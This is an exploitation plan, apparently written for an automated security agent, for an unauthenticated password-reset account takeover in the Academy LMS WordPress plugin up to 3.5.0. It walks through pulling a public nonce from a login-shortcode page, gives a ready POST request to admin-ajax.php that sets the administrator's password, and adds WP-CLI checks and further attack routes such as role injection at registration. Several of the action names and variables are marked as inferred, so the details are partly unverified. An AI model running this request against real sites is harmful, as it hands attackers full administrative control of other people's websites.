Academy LMS – WordPress LMS Plugin for Complete eLearning Solution <= 3.5.0 - Unauthenticated Privilege Escalation via Account Takeover

This plan outlines the research and exploitation process for CVE-2025-15521 in the Academy LMS plugin. This vulnerability allows an unauthenticated attacker to reset the password of any user, including administrators, by exploiting a flaw in the password reset AJAX handler which fails to validate identity beyond a publicly accessible nonce.

1. Vulnerability Summary

The vulnerability exists in the password update mechanism of the Academy LMS plugin (<= 3.5.0). The plugin registers an AJAX handler for unauthenticated users (wp_ajax_nopriv_...) that handles password resets. Instead of validating a unique, time-limited token sent via email, the vulnerable code path accepts a user-specified user_id and password, validating the request only with a standard WordPress nonce. Since this nonce is often exposed to all visitors on login or registration pages, an attacker can obtain it and submit a request to change the password of any arbitrary user_id.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• AJAX Action: academy_reset_password (inferred based on plugin naming conventions; to be verified in code).
• Vulnerable Parameter(s): user_id (or user_login), password, and nonce.
• Authentication: None (Unauthenticated).
• Preconditions:
  • The plugin must be active.
  • A valid nonce for the specific action must be obtainable from the frontend.
  • The attacker must know or guess the ID of the target user (ID 1 is almost always the primary administrator).

3. Code Flow (Inferred)

1. Registration: The plugin registers the action:
   add_action( 'wp_ajax_nopriv_academy_reset_password', [ $this, 'reset_password_handler' ] );
2. Nonce Verification: The handler calls check_ajax_referer( 'academy_nonce', 'nonce' ); or wp_verify_nonce(). This is the only "security" check.
3. Missing Token Check: The code fails to check for a rp_key (reset password key) normally stored in the database and sent via email during a legitimate WordPress password reset.
4. Password Update: The code retrieves the user:
   $user_id = intval( $_POST['user_id'] );
$new_password = $_POST['password'];
wp_set_password( $new_password, $user_id );
5. Sink: wp_set_password updates the database, effectively locking out the original user and granting the attacker access.

4. Nonce Acquisition Strategy

To bypass the nonce check, we must find where Academy LMS enqueues its AJAX script and localizes the nonce.

1. Identify Shortcode: Academy LMS typically uses shortcodes for user-facing pages.
   • Login: [academy_login]
   • Registration: [academy_registration]
2. Setup Page: Create a public page containing the login shortcode:
   wp post create --post_type=page --post_status=publish --post_title="Auth Page" --post_content='[academy_login]'
3. Extract Nonce:
   • Navigate to the newly created page using browser_navigate.
   • Academy LMS often localizes data under a global JS object.
   • Inferred JS Variable: academy_lms_vars or academy_data.
   • Action Nonce Key: nonce or academy_nonce.
   • Execution: browser_eval("window.academy_lms_vars?.nonce") (Replace with the actual variable found in the page source).

5. Exploitation Strategy

Once the nonce is acquired, we will simulate the malicious password reset request.

Step 1: Determine Admin User ID
Usually, the admin is ID 1. To be sure:
wp user list --role=administrator --fields=ID

Step 2: Perform the Takeover
Submit a POST request to admin-ajax.php.

• Method: POST
• URL: http://<target-ip>/wp-admin/admin-ajax.php
• Content-Type: application/x-www-form-urlencoded
• Parameters:
  • action: academy_reset_password (Verify this string in the plugin source, likely in a class handling AJAX).
  • nonce: [EXTRACTED_NONCE]
  • user_id: 1 (The target administrator ID)
  • password: NewAdminPassword123!

Request Template:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=academy_reset_password&nonce=a1b2c3d4e5&user_id=1&password=NewAdminPassword123!

6. Test Data Setup

1. Install Plugin: Ensure Academy LMS version 3.5.0 is installed.
2. Create Admin: Ensure a user with ID 1 exists (standard WP install).
3. Create Nonce Source: Create a page with the [academy_login] shortcode to ensure the nonce is generated and localized for the unauthenticated session.

7. Expected Results

• The AJAX request should return a success message (e.g., {"success": true} or a string "Password updated").
• The WordPress database will be updated with the new password hash for the target user.

8. Verification Steps

After sending the exploit request, verify the change via WP-CLI:

1. Check Password Compatibility:
   wp user check-password admin NewAdminPassword123!
   Expected output: Success: Password is correct.
2. Check User Meta:
   wp user get 1 --fields=user_login,user_email
   Confirm the user is still the intended administrator.

9. Alternative Approaches

• Registration Bypass: Check if the registration handler (wp_ajax_nopriv_academy_register) allows passing a role parameter. If it does, an attacker could register directly as an administrator.
• User ID Enumeration: If user_id is not the parameter, check for user_login. If the plugin uses user_login, use standard WP author enumeration (/?author=1) to find the username first.
• Different Nonce Actions: If academy_reset_password is not the action, search the codebase for all occurrences of wp_ajax_nopriv_ and cross-reference them with functions calling wp_set_password or update_user_meta.